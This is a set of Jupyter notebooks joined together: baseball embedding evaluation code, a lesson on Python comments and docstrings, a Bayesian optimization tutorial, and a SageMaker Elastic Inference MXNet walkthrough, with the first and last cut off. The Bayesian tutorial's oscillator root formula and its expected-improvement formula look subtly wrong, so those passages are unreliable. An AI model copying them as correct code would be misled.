outcome_counts[matchup] = {} outcome_counts[matchup][outcome] = outcome_counts[matchup].get(outcome, 0) + 1 matchup_counts = list(matchup_counts.items()) matchup_counts.sort(key = lambda x: -x[1]) ``` To determine the effectiveness of <code>(batter|pitcher)2vec</code>, we need something to first establish a baseline. We'll use a naïve prediction strategy to fill that role. For any given batter, we'll define their expected outcome distribution as: $$p(o_i|b_j)=\frac{c_{i,j} + r_i}{\sum_{k=1}^{K} c_{j,k} + 1}$$ where $o_i$ denotes the outcome indexed by $i$, $c_{i,j}$ is the number of times the player indexed by $j$ had an at-bat resulting in the outcome indexed by $i$ in the training data, $r_i$ is the proportion of all at-bats that resulted in the outcome indexed by $i$ in the training data, and $K$ is the number of possible outcomes. Essentialy, the procedure adds one at-bat to each batter, but distributes the mass of that single bat across all outcomes based on data from all batters. You can think of $r_i$ as a type of "prior" or smoothing factor. $p(o_i|p_j)$ will be similarly defined. Finally, we'll define the expected outcome distribution for a given batter/pitcher matchup as: $$p(o_i|b_j,p_k) = \frac{p(o_i|b_j) + p(o_i|p_k)}{2}$$ ``` def get_past_outcome_counts(train_years, data, test_players, player_type): """Retrieve past outcome counts for a given player in the training set. :param train_years: :param data: :param test_players: :param player_type: """ past_outcome_counts = {} for year in train_years: for sample in data[year]: player = sample[player_type] if player in test_players: outcome = sample["outcome"] if player not in past_outcome_counts: past_outcome_counts[player] = {} past_outcome_counts[player][outcome] = past_outcome_counts[player].get(outcome, 0) + 1 return past_outcome_counts cutoff = 0 total_above = sum(1 for matchup_count in matchup_counts if matchup_count[1] >= cutoff) TOP_MATCHUPS = total_above print("Total Matchups: {0}".format(TOP_MATCHUPS)) test_batters = {matchup[0].split("_")[0] for matchup in matchup_counts[:TOP_MATCHUPS]} test_pitchers = {matchup[0].split("_")[1] for matchup in matchup_counts[:TOP_MATCHUPS]} test_matchups = {matchup[0] for matchup in matchup_counts[:TOP_MATCHUPS]} past_batter_outcome_counts = get_past_outcome_counts(train_years, data, test_batters, "batter") past_pitcher_outcome_counts = get_past_outcome_counts(train_years, data, test_pitchers, "pitcher") # Get total outcome counts from training data. train_outcome_counts = {} for year in train_years: for sample in data[year]: outcome = sample["outcome"] train_outcome_counts[outcome] = train_outcome_counts.get(outcome, 0) + 1 # Convert total outcome counts into a probability distribution. total_outcomes = sum(train_outcome_counts.values()) for outcome in train_outcome_counts: train_outcome_counts[outcome] /= total_outcomes past_batter_probs = {} for batter in test_batters: past_batter_outcome_total = sum(past_batter_outcome_counts[batter].values()) past_batter_probs[batter] = {} for outcome in train_outcome_counts: past_batter_probs[batter][outcome] = (past_batter_outcome_counts[batter].get(outcome, 0) + train_outcome_counts[outcome]) / (past_batter_outcome_total + 1) past_pitcher_probs = {} for pitcher in test_pitchers: past_pitcher_outcome_total = sum(past_pitcher_outcome_counts[pitcher].values()) past_pitcher_probs[pitcher] = {} for outcome in train_outcome_counts: past_pitcher_probs[pitcher][outcome] = (past_pitcher_outcome_counts[pitcher].get(outcome, 0) + train_outcome_counts[outcome]) / (past_pitcher_outcome_total + 1) ``` We can then calculate the log loss of this naïve approach on unseen matchups. ``` from statsmodels.stats.weightstats import ttest_ind test_data_sets = {"batter": [], "pitcher": [], "outcome": []} naive_losses = [] for sample in data[test_year]: batter = sample["batter"] pitcher = sample["pitcher"] matchup = "{0}_{1}".format(batter, pitcher) if matchup not in test_matchups: continue outcome = sample["outcome"] past_batter_prob = past_batter_probs[batter][outcome] past_pitcher_prob = past_pitcher_probs[pitcher][outcome] naive_prob = (past_batter_prob + past_pitcher_prob) / 2 naive_loss = -np.log(naive_prob) naive_losses.append(naive_loss) for column in sample: value = sample[column] value_index = category_to_int[column][value] test_data_sets[column].append([value_index]) avg_naive_loss = sum(naive_losses) / len(naive_losses) print("Naïve Loss: {0:.4f}".format(avg_naive_loss)) print(len(naive_losses)) ``` And we can now see how <code>(batter|pitcher)2vec</code> compares. ``` for column in ["batter", "pitcher"]: test_data_sets[column] = np.array(test_data_sets[column]) X_list = [test_data_sets["batter"], test_data_sets["pitcher"]] y = test_data_sets["outcome"] preds = model.predict(X_list) # result = model.evaluate(X_list, np_utils.to_categorical(np.array(test_data_sets["outcome"]), NUM_OUTCOMES), verbose = 0) # print(result) net_losses = [] for i in range(preds.shape[0]): net_loss = -np.log(preds[i][y[i]][0]) net_losses.append(net_loss) avg_net_loss = sum(net_losses) / len(net_losses) print("(batter|pitcher)2vec: {0:.4f}".format(avg_net_loss)) print(len(net_losses)) print("{0:.2f}% fewer bits on average.".format(100 * (1 - avg_net_loss / avg_naive_loss))) print(ttest_ind(net_losses, naive_losses, alternative = "smaller")) ``` As you can see, <code>(batter|pitcher)2vec</code> is a significantly better at modeling outcome distributions for unseen batter/pitcher matchups than the naïve baseline. But is an improvement of only 0.94% over the baseline particularly impressive? Let's see how our logistic regression model fairs. ``` if TRAIN_ALT: X_batters = csr_matrix(np_utils.to_categorical(np.array(test_data_sets["batter"]), NUM_BATTERS)) X_pitchers = csr_matrix(np_utils.to_categorical(np.array(test_data_sets["pitcher"]), NUM_PITCHERS)) X = hstack([X_batters, X_pitchers]) preds = alt_model.predict_proba(X) lr_losses = [] for i in range(preds.shape[0]): lr_loss = -np.log(preds[i][y[i]][0]) lr_losses.append(lr_loss) avg_lr_loss = sum(lr_losses) / len(lr_losses) print("Logistic Regression: {0:.4f}".format(avg_lr_loss)) print(len(lr_losses)) print("{0:.2f}% fewer bits on average.".format(100 * (1 - avg_lr_loss / avg_naive_loss))) print(ttest_ind(lr_losses, naive_losses, alternative = "smaller")) ``` The logistic regression model actually performs slightly worse than our naïve approach! The neural net strategy seems to be a promising one.
github_jupyter
# Functions - Best practices In this notebook we will discuss a bit about what are the best practices of documenting and writing functions. These topics won't be graded but they will give you a general idea of what to do once you start developing in real-world. They are also usable throughout any programming language. The following are just initial ideas for you to think about and use during the course. Commenting, what to comment and how to comment are open-ended discussions and different people have different opinions. Just make sure, pretty please 🙏, that you comment and document what you don't know. I can't stress this enough, **You don't know how many times people had to refactor code and redo everything just because they forgot what it did.** ## Comments Everyone likes comments and everyone knows that they are important. Leaving comments in the code allows others to understand our thought process and allows you to return to the code, after some days, and still understand what the hell you were trying to do at that time. I know it sounds troublesome and you think that you will remember what you were doing, but trust me when I say this: ### You won't remember everything so might as well add some comments Initially, and after reading all these warnings your thought process will likely be ![Comments everywhere](assets/comments-comments-everywhere.jpeg) But **be careful!** If you start commenting everything like in the function `adding_function` below, most of your comments will feel like noise and the important comments will be lost in the spam ``` # Example of spammy comments def adding_function(int_1, int_2): # This function adds two integers -> as the name and parameters already suggest, useless comment # Adding variables a+b -> useless as well, any person that sees this knows that it's an adding operation result = int_1 + int_2 #returns the result of the sum made above -> we know already 😂 return result # In this case the code is very self-descriptive, so it may not need any comments really ``` When taking comments into consideration, and this will be hard at first, you need to find balance between over-commenting and commenting what is needed. Your variables should also be descriptive of what you are trying to achieve ``` import re def sanitize_string(string): if type(string) is not str: # No need for a comment, you understand by the print and condition what is happening here print("Not a string!") return # Wow, what the *!F$% is this next piece of code doing? # -> Maybe I should document this for other people and myself in the future! # regex, removes any character that is not a space, number or letter clean_string = re.sub('[^A-Za-z0-9 ]+', '', string) # this you probably know, but if you don't -> comment! # It lowercases the string return clean_string.lower() weird_string = "^*ººHe'?llo Woç.,-rld!" sanitize_string(weird_string) sanitize_string(2) ``` <div> <img alt="perfectly balanced", src="./assets/perfectly_balanced.jpeg" width="400"> </div> Commenting is completely up to the programmer. It's **your responsability** to know what you are doing and to make sure that the people who are reading your code understand what you were doing at the time of writing! * Use clear, descriptive variables! * Use clear, descriptive function names - `function_one` doesn't add any information on what it does! * If you are making any assumption inside the code - document it! * If you are fixing an edge case (i.e., a very specific problem/condition of your solution) - document it! * If you feel that it's not clear what you have done - leave a comment! * Don't add comments to every line of the program describing every single thing you do, most of them probably won't add any value ## Docstrings Python documentation strings - docstrings - are a way of providing a convenient and constant way of writing a description to any type of functions, classes and methods (the last two you will learn later on). There are several ways of writing docstrings, I'll introduce you to a specific one but in general they all tend to rotate around the same idea which is - **document and comment your function!** Usually every function should state its purpose and give a general description of what it receives (parameters) and what it returns. Moreover, some IDEs - like VSCode, not Jupyter - already come with this option so usually if you write `"""` and click enter after a function it will create a docstring for you to fill Example shown below <div> <img alt="docstring_1", src="./assets/docstring_01.png" width="600"> </div> After pressing Enter this is what shows up! <div> <img alt="docstring_2", src="./assets/docstring_02.png" width="600"> </div> Pretty cool right?! Some IDEs already give you all the tools to employ Docstrings so there is really no excuse! **Note:** You may need to activate this feature on your IDE. For VSCode you might need to install this plugin: https://marketplace.visualstudio.com/items?itemName=njpwerner.autodocstring -> check its example for a detailed video on how to do this Using function `sanitize_string` as an example: ``` def sanitize_string(string): """ Cleans a string by removing any characters that are not spaces, numbers or letters. returns it in lowercase :param string: string to be cleaned :return: sanitized string """ if type(string) is not str: print("Not a string!") return # removes any character that is not a space, number or letter clean_string = re.sub('[^A-Za-z0-9 ]+', '', string) return clean_string.lower() ``` In conclusion, docstrings are a really good way of documenting every function you use on a program! Keeping it constant throughout all functions leads to a very organised commenting. Moreover (and this is the fun interesting part!), there are tools - like [Sphinx](https://www.sphinx-doc.org/en/master/) - that you can use that transform all these docstring comments into a web documentation page automatically! For a real life example, the [Numpy documentation page](https://numpy.org/doc/stable/reference/) (a really valuable tool for data scientists!) was created automatically by using Sphinx with docstrings! There are many many more stuff that can be done here but I don't want to kill you with information overload. If you focus on these two topics it will be of great help to you in the future! Thank you for reading this, have an appreciation meme! <div> <img alt="love_python", src="./assets/program_python.png" width="400"> </div>
github_jupyter
# Bayesian optimization *Selected Topics in Mathematical Optimization: 2017-2018* **Michiel Stock** ([email](michiel.stock@ugent.be)) ![](Figures/logo.png) ``` import numpy as np import sympy as sp sp.init_printing() from numpy import sin, exp, cos from sklearn.preprocessing import normalize from scipy.stats import norm from scipy.integrate import odeint import matplotlib.pyplot as plt from sklearn.gaussian_process import GaussianProcessRegressor %matplotlib inline np.random.seed(3) blue = '#264653' green = '#2a9d8f' yellow = '#e9c46a' orange = '#f4a261' red = '#e76f51' black = '#50514F' ``` ## Motivation **Goal**: Solve $$ \mathbf{x}^* = \text{arg min}_\mathbf{x}\, f(\mathbf{x}) $$ when every evaluation of $f(\mathbf{x})$ is *expensive*. **Example 1**: *Dark art* of selecting the right hyperparameters for a machine learning model. Ditto for many optimization methods! ![Machine learning models often have many hyperparameters.](Figures/ANN_hyperpars.png) **Example 2**: *Model calibration* to find the right parameters or structure of a mechanistic model. **Example 3**: Experimentation for improvement (drug design, product development, new cooking recipes...): 1. Gather data 2. Make model 3. Select new experiments for testing in the lab 4. Repeat ## Leading example Damped spring mass system. ![Spring with mass, damped](Figures/spring.png) Model: $$ m\ddot{y}(t) + \gamma \dot{y}(t) + k y(t) = 0\,, $$ with: - $m$: the mass (1 kg) - $\gamma$: friction parameter (unknown) - $k$: the spring constant (unknown) Can be simulated (here exact solution known). ``` def damped_oscillator(t_vals, g, k, m=1, sigma=0, x0=1): if g**2 > 4*k*m: l1 = (-g**2 + (g**2 - 4*k*m)**0.5) / (2 * m) l2 = (-g**2 - (g**2 - 4*k*m)**0.5) / (2 * m) c1, c2 = np.linalg.solve([[1, 1], [l1, l2]], [[x0], [0]]).flatten() y_vals = c1 * exp(t_vals * l1) + c2 * exp(t_vals * l2) elif g**2 == 4*k*m: l1 = - g / (2 * m) c1, c2 = np.linalg.solve([[1, 0], [l1, 1]], [[x0], [0]]).flatten() y_vals = c1 * exp(t_vals * l1) + c2 * t_vals * exp(t_vals * l1) else: alpha = - g / (2 * m) beta = (4 * m * k - g**2)**0.5 / (2 * m) c1, c2 = np.linalg.solve([[1, 0], [alpha, beta]], [[x0], [0]]).flatten() y_vals = exp(alpha * t_vals) * (c1 * cos(beta * t_vals) + c2 * sin(beta * t_vals)) return y_vals + np.random.randn(len(t_vals)) * sigma fig, ax = plt.subplots() t_vals = np.linspace(0, 5, num = 1000) for g in np.logspace(-2, 2, num=4): for k in np.logspace(-2, 2, num=4): y_vals = damped_oscillator(t_vals, g=g, k=k) ax.plot(t_vals, y_vals) ax.set_xlabel('$t$') ax.set_ylabel('$y(t)$') ``` ## Finding the best model parameters We perform some experiments, and have 20 noisy measurements. ``` # parameters m=1 # known kstar=7 # unknown gstar=1 # unknown # noisy observations t_meas = np.linspace(0, 5, num=20) y_obs = damped_oscillator(t_meas, g=gstar, k=kstar, m=m, sigma=0.15) # true function t_vals = np.linspace(0, 5, num = 1000) y_vals = damped_oscillator(t_vals, g=gstar, k=kstar, m=m) fig, ax = plt.subplots() ax.plot(t_vals, y_vals, c=blue, label='unknown parametrized function') ax.scatter(t_meas, y_obs, c=red, label='noisy observations') ax.set_xlabel('$t$') ax.set_ylabel('$y(t)$') ax.legend(loc=0) ``` For a given $\gamma$ and $k$, compute the mean squared error: $$ MSE(\gamma, k) = \frac{1}{20} \sum_{i=1}^{20} (y(t_i) - \hat{y}(t_i, \gamma, k))^2 $$ Best parameters obtained by: $$ \gamma^*, k^* = \text{arg min}_{\gamma, k} MSE(\gamma, k) $$ ``` def get_mse(g, k): """ Computes the mean squared error for a given gamma and k. """ y_sim = damped_oscillator(t_meas, g=g, k=k) return np.log10(np.mean((y_sim - y_obs)**2)) ``` Since gamma and kappa are positive values for which we do not know the scale, it makes sense to work with the logarithm of these paramaters. ``` g_vals = np.logspace(-2, 2, num=100) k_vals = np.logspace(-2, 2, num=100) mse_pars = np.zeros((len(g_vals), len(k_vals))) for i, g in enumerate(g_vals): for j, k in enumerate(k_vals): mse_pars[i, j] = get_mse(g=g, k=k) ``` Because the example is simple, we can search the complete space for the best parameters. ``` G, K = np.meshgrid(g_vals, k_vals) fig, ax = plt.subplots(figsize=(6, 6)) ax.contourf(K, G, mse_pars.T) ax.set_xlabel('$k$') ax.set_ylabel('$g$') ax.scatter(kstar, gstar, c='y') ax.loglog() ``` In general, it is *not* possible to sample the whole parameter space. If the model is really complex, even a single evalutation might be expensive! What if we only can test a limited number of parameter combinations? ## Grid search vs. random search ``` param_grid = np.array([[g, k] for k in np.logspace(-1.5, 1.5, num=4) for g in np.logspace(-1.5, 1.5, num=4)]) param_random = 10**np.random.uniform(-2, 2, size=(16, 2)) fig, (ax0, ax1) = plt.subplots(ncols=2, figsize=(12, 5)) ax0.scatter(param_grid[:,0], param_grid[:,1], c=red, label='samples') ax0.set_title('Grid') ax1.scatter(param_random[:,0], param_random[:,1], c=red, label='samples') ax1.set_title('Random') for ax in (ax1, ax0): ax.scatter(kstar, gstar, c=yellow, label='optimal parameters') ax.loglog() ax.set_xlabel('$k$') ax.set_ylabel('$\gamma$') ax.set_ylim([1e-2, 1e2]) ax.set_xlim([1e-2, 1e2]) ax.legend(loc=0) ``` > **Don't use grid search!** ``` # evaluate instances simulated_parameters = param_random #simulated_parameters = param_grid mse_obs = np.array([get_mse(g=g, k=k) for g, k in simulated_parameters]) mse_obs ``` ## Surrogate modelling with Gaussian processes Predict the performance of *new* parameter combinations using a surrogate model. (From here on onwards, $\mathbf{x}\in\mathcal{X}$ is used to denote the parameters) Gaussian process: - learn a function of the form $f: \mathcal{X}\rightarrow \mathbb{R}$ - nonlinear model, uses a positive-definite covariance function $K:\mathcal{X} \times \mathcal{X} \rightarrow \mathbb{R}$ - Bayesian method: prior on function and use Bayes' theorem to condition on observed data - can be updated if more date becomes available (online learning) - fully probabilistic, in theory no tuning! The model return for a given instance $\mathcal{x}$: - $\mu(\mathbf{x})$: expected value; - $\sigma(\mathbf{x})$: standard deviation. For a brief, but well-founded overview of Gaussian processes, consult the [chapter](http://www.inference.org.uk/mackay/gpB.pdf) in the book of MacKay. ``` gaussian_process = GaussianProcessRegressor(alpha=1e-3) # take logarithm of MSE and the parameters to obtain better scaling gaussian_process.fit(np.log10(simulated_parameters), mse_obs) instance = np.log10([[3, 0.1]]) mu, sigma = gaussian_process.predict(instance, return_std=True) print('Predicted MSE: {} ({})'.format(mu[0], sigma[0])) ``` Explore whole parameter space. ``` mu_mse = np.zeros_like(mse_pars) std_mse = np.zeros_like(mse_pars) for i, g in enumerate(g_vals): for j, k in enumerate(k_vals): instance = np.log10([[g, k]]) mu, sigma = gaussian_process.predict(instance, return_std=True) mu_mse[i, j] = mu[:] std_mse[i, j] = sigma[:] fig, (ax0, ax1) = plt.subplots(ncols=2, figsize=(12, 5)) ax0.contourf(K, G, mu_mse.T) ax0.set_title('Estimated MSE') ax1.contourf(K, G, std_mse.T) ax1.set_title('Std MSE') for ax in (ax0, ax1): ax.set_xlabel('$k$') ax.set_ylabel('$\gamma$') ax.loglog() ax.scatter(kstar, gstar, c=yellow) ax.scatter(simulated_parameters[:,0], simulated_parameters[:,1], c=red) ``` Slice for $k=1$. ``` k_slice = np.column_stack((np.logspace(-2, 2, num=100), [1]*100)) # expected mse, std mu, sigma = gaussian_process.predict(np.log10(k_slice), return_std=True) fig, ax = plt.subplots() ax.plot(k_slice[:,0], mu, c=green, label='expected value') ax.plot(k_slice[:,0], mu-2*sigma, c=orange, ls='--', label='95% interval') ax.plot(k_slice[:,0], mu+2*sigma, c=orange, ls='--') ax.semilogx() ax.set_xlabel('$\gamma$') ax.set_ylabel('predicted MSE') ax.legend(loc=0) ``` ## Acquisition functions How to choose points to simulate/test? Acquisition function $a:\mathcal{X}\rightarrow\mathbb{R}^+$, determines how 'interesting' a point is to explore. Choose $$ \mathbf{x}_\text{next} = \text{arg max}_\mathbf{x} a(\mathbf{x})\,. $$ Trade-off between *exploration* and *exploitation*. **Probability of Improvement** $$ a_\text{PI}(\mathbf{x}) = P(f(\mathbf{x})<f(\mathbf{x}_\text{best}) ) = \Phi(\gamma(\mathbf{x}))\,, $$ with $\Phi(\cdot)$ the CDF of a standard normal distirbution and $$ \gamma(\mathbf{x})= \frac{f(x_\text{best}) - \mu(\mathbf{x})}{\sigma(\mathbf{x})}\,. $$ ``` def calculate_gamma(mu, sigma, fbest): return (fbest - mu) / sigma def probability_improvement(mu, sigma, fbest=np.min(mse_obs)): """ Calculates probability of improvement. """ gamma_values = calculate_gamma(mu, sigma, fbest) return norm.cdf(gamma_values) ``` **Expected Improvement** $$ a_\text{EI}(\mathbf{x}) = E[\max(f(\mathbf{x}) - f(\mathbf{x}_\text{best}), 0)] = \sigma(\mathbf{x})(\gamma(\mathbf{x})\Phi(\gamma(\mathbf{x})) + \phi(\gamma(\mathbf{x}))\,, $$ with $\phi(\cdot)$ the PDF of a standard normal distirbution. ``` def expected_improvement(mu, sigma, fbest=np.min(mse_obs)): """ Calculates expected improvement. """ gamma_values = calculate_gamma(mu, sigma, fbest) return sigma * (gamma_values * norm.cdf(gamma_values) + norm.pdf(gamma_values)) ``` **GP Lower Confidence Limit** $$ a_\text{LCB} = \mu(\mathbf{x}) - \kappa \sigma(\mathbf{x})\,, $$ with $\kappa$ a parameter determining the tightness of the bound. ``` def lower_confidence_bound(mu, sigma, kappa=2): """ Calculates lower confidence bound. Made negative: maximizing acquisition function! """ return - (mu - kappa * sigma) def plot_acquisitions(): fig, (ax0, ax1, ax2, ax3) = plt.subplots(nrows=4, sharex=True, figsize=(8, 10)) # plot mu and sigma ax0.plot(k_slice[:,0], mu, c=green, label='expected value') ax0.plot(k_slice[:,0], mu-2*sigma, c=orange, ls='--', label='95% interval') ax0.plot(k_slice[:,0], mu+2*sigma, c=orange, ls='--') ax0.semilogx() ax0.set_ylabel('predicted\nMSE') # plot information gains ax1.plot(k_slice[:,0], probability_improvement(mu, sigma), c=blue, label='PI') ax1.set_ylabel('PI') ax2.plot(k_slice[:,0], expected_improvement(mu, sigma), c=blue, label='EI') ax2.set_ylabel('EI') ax3.plot(k_slice[:,0], lower_confidence_bound(mu, sigma), c=blue, label='LCB') ax3.set_ylabel('LCB') ax3.set_xlabel('$\gamma$') plot_acquisitions() PI = np.zeros_like(mse_pars) EI = np.zeros_like(mse_pars) LCB = np.zeros_like(mse_pars) for i, g in enumerate(g_vals): for j, k in enumerate(k_vals): instance = np.log10([[g, k]]) mu, sigma = gaussian_process.predict(instance, return_std=True) mu = mu[:] sigma = sigma[:] PI[i,j] = probability_improvement(mu, sigma) EI[i,j] = expected_improvement(mu, sigma) LCB[i,j] = lower_confidence_bound(mu, sigma) def show_acquisition_contourf(ax0, ax1, ax2): ax0.contourf(K, G, PI.T) ax0.set_title('PI') ax0.scatter(simulated_parameters[:,0], simulated_parameters[:,1], c=red) ax1.contourf(K, G, EI.T) ax1.set_title('EI') ax1.scatter(simulated_parameters[:,0], simulated_parameters[:,1], c=red) ax2.contourf(K, G, LCB.T) ax2.set_title('LCB') ax2.scatter(simulated_parameters[:,0], simulated_parameters[:,1], c=red) for ax in (ax0, ax1, ax2): ax.set_xlabel('$k$') ax.set_ylabel('$\gamma$') ax.loglog() ax.scatter(kstar, gstar, c=yellow) ax.scatter(simulated_parameters[:,0], simulated_parameters[:,1], c=red) fig, (ax0, ax1, ax2) = plt.subplots(ncols=3, figsize=(13, 5)) show_acquisition_contourf(ax0, ax1, ax2) ``` Use Gaussian process model to select new points to evaluate! ## Gradient-based optimization for finding next point If we assume that evaluating points from the Gaussian process surogate model is much cheaper than evaluating the true function, we can either use an exhaustive sampling of this space (if the dimension is not too large) or use a gradient-based optimizer to find a maximizer of the acquisition function. ``` from scipy.optimize import minimize neg_acquisition = lambda parameter : -probability_improvement(*gaussian_process.predict(parameter.reshape((1,2)), return_std=True)) # start from best previous point f0, x0 = min(zip(mse_obs, simulated_parameters)) result = minimize(neg_acquisition, x0=x0, bounds=[(-2, 2), (-2, 2)]) xnew = result.x result print('New parameters to try: {}'.format(10**xnew)) ``` ## Concluding remarks **Remark 1** Gaussian process model usually continuous and differentiable w.r.t. $\mathbf{x}$: - $\nabla \mu(\mathbf{x})$ - $\nabla \sigma(\mathbf{x})$ gradient-based optimization! **Ramark 2** Use of correlation between instances: ``` param_random = 10**np.random.uniform(-2, 2, size=(20, 2)) mu, cov = gaussian_process.predict(np.log10(param_random), return_cov=True) fig, (ax0, ax1) = plt.subplots(ncols=2, figsize=(8, 4)) ax0.plot(10**mu) ax0.set_ylabel('estimated MSE') ax1.imshow(cov, interpolation='nearest', cmap='hot') ax1.set_title('Covariance') ``` Use coviance to select a *set* of informative instances to explore! **Remark 3** Some instances will differ in execution times: - regularization size (machine learning) - learning rate (machine learning) - number of parameters - grid size approximation (mechanistic modelling) Better optimize *expected improvement per second*. Use a model of expected duration (second Gaussian process). ## References Snoek, J., Larochelle, H., Adams, R. '*Practical Bayesian optimization of machine learning algorithms*'. Advances in Neural Information Processing Systems (2012) Rasmussen, C., Williams, C., '*Gaussian Processes for Machine Learning*'. The MIT Press (2006)
github_jupyter
# Using Amazon Elastic Inference with MXNet on an Amazon SageMaker Notebook Instance This notebook demonstrates how to enable and utilize Amazon Elastic Inference with our predefined SageMaker MXNet containers. Amazon Elastic Inference (EI) is a resource you can attach to your Amazon EC2 instances to accelerate your deep learning (DL) inference workloads. EI allows you to add inference acceleration to an Amazon SageMaker hosted endpoint or Jupyter notebook for a fraction of the cost of using a full GPU instance. For more information please visit: https://docs.aws.amazon.com/sagemaker/latest/dg/ei.html This notebook is an adaption of the [SageMaker MXNet MNIST notebook](https://github.com/awslabs/amazon-sagemaker-examples/blob/master/sagemaker-python-sdk/mxnet_mnist/mxnet_mnist.ipynb), with modifications showing the changes needed to enable and use EI with MXNet on SageMaker. 1. [Using Amazon Elastic Inference with MXNet on an Amazon SageMaker Notebook Instance](#Using-Amazon-Elastic-Inference-with-MXNet-on-an-Amazon-SageMaker-Notebook-Instance) 1. [MNIST dataset](#MNIST-dataset) 1. [Setup](#Setup) 1. [The training script](#The-training-script) 1. [SageMaker's MXNet estimator class](#SageMaker's-MXNet-estimator-class) 1. [Running the Training job](#Running-the-Training-job) 1. [Creating an inference endpoint and attaching an EI accelerator](#Creating-an-inference-endpoint-and-attaching-an-EI-accelerator) 1. [How our models are loaded](#How-our-models-are-loaded) 1. [Using EI with a SageMaker notebook instance](#Using-EI-with-a-SageMaker-notebook-instance) 1. [Making an inference request locally](#Making-an-inference-request-locally) 1. [Delete the Endpoint](#Delete-the-endpoint) If you are familiar with SageMaker and already have a trained model, skip ahead to the [Creating-an-inference-endpoint section](#Creating-an-inference-endpoint-with-EI) For this example, we will be utilizing the SageMaker Python SDK, which makes it easy to train and deploy MXNet models. In this example, we train a simple neural network using the Apache MXNet [Module API](https://mxnet.apache.org/api/python/module/module.html) and the MNIST dataset. ### MNIST dataset The MNIST dataset is widely used for handwritten digit classification, and consists of 70,000 labeled 28x28 pixel grayscale images of hand-written digits. The dataset is split into 60,000 training images and 10,000 test images. There are 10 classes (one for each of the 10 digits). The task at hand is to train a model using the 60,000 training images and subsequently test its classification accuracy on the 10,000 test images. ### Setup Let's start by creating a SageMaker session and specifying the IAM role arn used to give training and hosting access to your data. See the [documentation](https://docs.aws.amazon.com/sagemaker/latest/dg/sagemaker-roles.html) for how to create these. Note, if more than one role is required for notebook instances, training, and/or hosting, please replace the `sagemaker.get_execution_role()` with a the appropriate full IAM role arn string(s). ``` import sagemaker role = sagemaker.get_execution_role() ``` This notebook shows how to use the SageMaker Python SDK to run your code in a local container before deploying to SageMaker's managed training or hosting environments. Just change your estimator's instance_type to local or local_gpu. For more information, see [local mode](https://github.com/aws/sagemaker-python-sdk#local-mode). To use Amazon Elastic Inference locally change your `accelerator_type` to `local_sagemaker_notebook` when calling `deploy()`. ***`local_sagemaker_notebook` will only work if you created your notebook instance with an EI accelerator attached to it.*** In order to use this feature you'll need to install docker-compose (and nvidia-docker if training with a GPU). Running following script will install docker-compose or nvidia-docker-compose and configure the notebook environment for you. Note, you can only run a single local notebook at a time. ``` !/bin/bash ./setup.sh ``` ### The training script The ``mnist_ei.py`` script provides all the code we need for training and hosting a SageMaker model. The script also checkpoints the model at the end of every epoch and saves the model graph, params and optimizer state in the folder `/opt/ml/checkpoints`. If the folder path does not exist then it will skip checkpointing. The script we will use is adaptated from Apache MXNet [MNIST tutorial](https://mxnet.incubator.apache.org/tutorials/python/mnist.html). ``` !pygmentize mnist_ei.py ``` ### SageMaker's MXNet estimator class The SageMaker ```MXNet``` estimator allows us to run single machine or distributed training in SageMaker, using CPU or GPU-based instances. When we create the estimator, we pass in the filename of our training script, the name of our IAM execution role, and the S3 locations we defined in the setup section. We also provide a few other parameters. ``instance_count`` and ``instance_type`` determine the number and type of SageMaker instances that will be used for the training job. The ``hyperparameters`` parameter is a ``dict`` of values that will be passed to your training script -- you can see how to access these values in the ``mnist_ei.py`` script above. For this example, we will train our model on the local instance this notebook is running on. This is achieved by using `local` for `instance_type`. By passing local, training will be done inside of a Docker container on this notebook instance. ``` from sagemaker.mxnet import MXNet mnist_estimator = MXNet( entry_point="mnist_ei.py", role=role, instance_count=1, instance_type="local", framework_version="1.7.0", py_version="py3", hyperparameters={"learning-rate": 0.1}, ) ``` ### Running the Training job After we've constructed our MXNet object, we can fit it using data stored in S3. Below we run SageMaker training on two input channels: **train** and **test**. During training, SageMaker makes this data stored in S3 available in the local filesystem where the mnist script is running. The ```mnist_ei.py``` script simply loads the train and test data from disk. ``` %%time import boto3 region = boto3.Session().region_name train_data_location = "s3://sagemaker-sample-data-{}/mxnet/mnist/train".format(region) test_data_location = "s3://sagemaker-sample-data-{}/mxnet/mnist/test".format(region) mnist_estimator.fit({"train": train_data_location, "test": test_data_location}) ``` ### Creating an inference endpoint and attaching an EI accelerator After training, we use the ``MXNet`` estimator object to build and deploy an ``MXNetPredictor``. This creates a Sagemaker endpoint -- a hosted prediction service that we can use to perform inference. The arguments to the ``deploy`` allows us to set the following: * `instance_count` - how many instances to back the endpoint. * `instance_type` - which EC2 instance type to use for the endpoint. For information on supported instance, please check [here](https://aws.amazon.com/sagemaker/pricing/instance-types/). * `accelerator_type` - determines which EI accelerator type to attach to each of our instances. The supported types of accelerators can be found here: https://aws.amazon.com/sagemaker/pricing/instance-types/ ### How our models are loaded You should provide your custom `model_fn` to use EI accelerator attached to your endpoint. An example of `model_fn` implementation is as follows: ```python def model_fn(model_dir): ctx = mx.cpu() sym, args, aux = mx.model.load_checkpoint(os.path.join(model_dir, 'model'), 0) sym = sym.optimize_for('EIA') mod = mx.mod.Module(symbol=sym, context=ctx, data_names=data_names, label_names=None) mod.bind(for_training=False, data_shapes=data_shapes) mod.set_params(args, aux, allow_missing=True) return mod ``` Check ``mnist_ei.py`` above for the specific implementation of `model_fn()` in this notebook example. In **EI MXNet 1.5.1 and earlier**, the predefined SageMaker MXNet containers have a default `model_fn`, which determines how your model is loaded. The default `model_fn` loads an MXNet Module object with a context based on the instance type of the endpoint. If an EI accelerator is attached to your endpoint and a custom `model_fn` isn't provided, then the default `model_fn` will load the MXNet Module object. This default `model_fn` works with the default `save` function. If a custom `save` function was defined, then you may need to write a custom `model_fn` function. For more information on `model_fn`, see [this documentation for using MXNet with SageMaker](https://sagemaker.readthedocs.io/en/stable/using_mxnet.html#load-a-model). For examples on how to load and serve a MXNet Module object explicitly, please see our [predefined default `model_fn` for MXNet](https://github.com/aws/sagemaker-mxnet-serving-container/blob/master/src/sagemaker_mxnet_serving_container/default_inference_handler.py#L36). ### Using EI with a SageMaker notebook instance Here we're going to utilize the EI accelerator attached to our local SageMaker notebook instance. This can be done by using `local_sagemaker_notebook` as the value for `accelerator_type`. This will make an inference request against the MXNet endpoint running on this Notebook Instance with an attached EI. An EI accelerator must be attached in order to make inferences using EI. As of now, an EI accelerator attached to a notebook will initialize for the first deep learning framework used to inference against EI. If you wish to use EI with another deep learning framework, please either restart or create a new notebook instance with the new EI. ***`local_sagemaker_notebook` will only work if you created your notebook instance with an EI accelerator attached to it.*** ***Please restart or create a new notebook instance if you wish to use EI with a different framework than the first framework used on this notebook instance as specified when calling `deploy()` 